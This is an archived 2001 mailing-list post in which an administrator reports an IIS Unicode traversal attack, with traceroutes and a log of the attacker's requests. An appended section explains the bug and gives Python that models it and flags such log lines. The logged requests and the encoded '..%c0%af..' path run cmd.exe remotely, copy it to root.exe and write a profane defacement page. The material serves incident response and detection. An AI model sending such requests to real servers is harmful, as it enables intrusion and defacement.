who's owning this ip?

From: Thomas Springer (tuevat_private)
Date: Tue May 08 2001 - 09:07:34 PDT


    We had an attacker exploiting Unicode on IIS 5 yesterday - see the funny
    Chinese war pages in the log below. The hacker successfully exploited the
    IIS Unicode bug and created ~100 files, but was still too dumb to deface the
    webserver.
    
    The attacker used 208.22.161.15 and 202.97.205.3.
    I tried a trace but ended up with
     ...
     19   210 ms   211 ms   220 ms  pao1-sjc2-oc48-2.pao1.above.net [
     20   210 ms   231 ms   230 ms  208.184.129.244.cmnetcom.com.hk [
     21   200 ms   211 ms   220 ms  202.0.170.34
     22   361 ms   370 ms   411 ms  202.0.170.13
     23   370 ms   391 ms   400 ms  202.97.10.193
     24   521 ms   541 ms   551 ms  202.97.10.66
     25   581 ms   601 ms   581 ms  61.138.38.2
     26   721 ms   711 ms   671 ms  61.180.139.202
     27   341 ms   350 ms   351 ms  202.97.205.3
    
    208.22.161.15 seems to end at
    17   130 ms   130 ms   131 ms  ewr-core-02.inet.qwest.net [205.171.17.130]
    18   110 ms   110 ms   111 ms  ewr-brdr-01.inet.qwest.net [205.171.17.82]
    19     *        *        *     Timeout..
    ....
    
    Any chance of finding out to whom the two IP addresses belong?
    Any tool that copies cmd.exe to root.exe?
    
    I liked this hack, because nothing happened and people here suddenly developed
    security awareness. Hence, even the servers I begged to secure for weeks
    are patched now.
    BTW, it's a German website - nothing to do with any Chinese-American spy wars.
    
    funny hackerworld...
    
    thomas
    
    --- IIS-Logsnip ---
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
    /scripts/../../winnt/system32/cmd.exe
    /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
    2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
    ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
    3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
    ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
    ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
    ndex.asp 502 355 423 - - -
    2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
    /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>
    ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%
    3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<f
    ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22
    ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</html^>>.././i
    ndex.htm 502 355 423 - - -
    
    
    Thomas Springer
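The log above records the textbook IIS Unicode directory-traversal sequence: reach cmd.exe through /scripts/ with an encoded "..", run "dir" to confirm, copy cmd.exe into the scripts directory as root.exe, then "echo" a defacement page redirected over index.asp and index.htm. The same payload text and root.exe copy are what the sadmind/IIS worm (CERT Advisory CA-2001-11, published the same week) did, which is the "tool" that copies cmd.exe to root.exe. The Python below is an example added to this archive page, not the poster's code and not from any product mentioned here. It does two things: it models why the traversal got past IIS, assuming a simplified version of the flaw (the ".." check running on the raw path before an overlong-UTF-8 decode; the decoder here is a hypothetical model, not IIS code), and it runs a triage pass over W3C-extended IIS log lines like the ones posted. The first three sample lines are the posted entries rejoined onto single lines with the echoed HTML shortened; the fourth is constructed benign traffic for contrast.

```python
"""Added example (not the poster's code): (1) a simplified model of the IIS
Unicode traversal bug (MS00-078) showing why ..%c0%af.. slipped past the '..'
check, and (2) a triage pass over W3C-extended IIS log lines like those posted."""
import re
from urllib.parse import unquote_plus, unquote_to_bytes

TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")


def lenient_utf8_decode(raw: bytes) -> str:
    """UTF-8 decoder that ACCEPTS overlong two-byte forms (%c0%af -> '/',
    %c1%9c -> '\\'). Hypothetical model of the flawed behaviour, not IIS code."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:                                   # plain ASCII
            out.append(chr(b)); i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # two-byte sequence; overlong lead bytes C0/C1 are NOT rejected
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))); i += 2
        else:                                          # anything else: replacement char
            out.append("\ufffd"); i += 1
    return "".join(out)


def vulnerable_resolve(uri_stem: str):
    """Bug order: check the RAW stem for '..', THEN decode. Returns (allowed, path)."""
    if TRAVERSAL.search(uri_stem):
        return False, None
    return True, lenient_utf8_decode(unquote_to_bytes(uri_stem))


def hardened_resolve(uri_stem: str):
    """Fixed order: strict decode (overlong forms raise), then check the result."""
    try:
        decoded = unquote_to_bytes(uri_stem).decode("utf-8")
    except UnicodeDecodeError:
        return False, None
    if TRAVERSAL.search(decoded):
        return False, None
    return True, decoded


# Three lines rejoined from the post above (echoed HTML shortened);
# the fourth is constructed benign traffic for contrast.
SAMPLE_LOG = r"""
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^</html^>>.././index.asp 502 355 423 - - -
2001-05-07 12:30:01 192.0.2.10 - 10.253.6.15 80 GET /default.asp - 200 1024 50 - - -
"""

COPY_RE = re.compile(r"copy\s+\S*cmd\.exe\s+\S*root\.exe", re.I)
ECHO_RE = re.compile(r"/c\s+echo\s+(.*)>(\S+)$", re.S)


def parse_echo_defacement(cmd: str):
    """From '/c echo ^<html^>...^</html^>>target' recover (visible text, target file)."""
    m = ECHO_RE.match(cmd)
    if not m:
        return None
    body, target = m.groups()
    body = body.replace("^", "")                       # '^' is the cmd.exe escape char
    text = " ".join(re.sub(r"<[^>]*>", " ", body).split())
    return text, target


def triage(log_text: str):
    """Flag cmd.exe reached via traversal, the root.exe copy, and root.exe calls."""
    findings = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 10 or line.startswith("#"):        # skip blanks and W3C headers
            continue
        date, time_, c_ip, _user, _s_ip, _port, method, stem, query, status = f[:10]
        low = stem.lower()
        if TRAVERSAL.search(stem) and low.endswith("cmd.exe"):
            kind = "cmd.exe via traversal"
        elif low.endswith("/root.exe"):
            kind = "root.exe invoked"
        else:
            continue
        cmd = unquote_plus(query)                      # '+' -> space, %3D -> '='
        if COPY_RE.search(cmd):
            kind = "cmd.exe copied to root.exe"
        findings.append({"time": f"{date} {time_}", "src": c_ip, "method": method,
                         "status": int(status), "kind": kind, "cmd": cmd,
                         "defacement": parse_echo_defacement(cmd)})
    return findings


if __name__ == "__main__":
    print(vulnerable_resolve("/scripts/..%c0%af../winnt/system32/cmd.exe"))
    print(hardened_resolve("/scripts/..%c0%af../winnt/system32/cmd.exe"))
    for hit in triage(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["kind"], hit["defacement"] or "")
```

Note that IIS writes the already-decoded stem to its log, which is why the posted lines show a plain "/scripts/../../winnt/system32/cmd.exe" rather than the "%c0%af" the attacker actually sent; the triage therefore keys on the decoded ".." plus cmd.exe rather than on the encoded form. The 502 status on the copy and echo lines means cmd.exe ran but the CGI wrapper did not get a valid HTTP response back, not that the command failed.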
    



    This archive was generated by hypermail 2b30 : Thu May 10 2001 - 18:54:07 PDT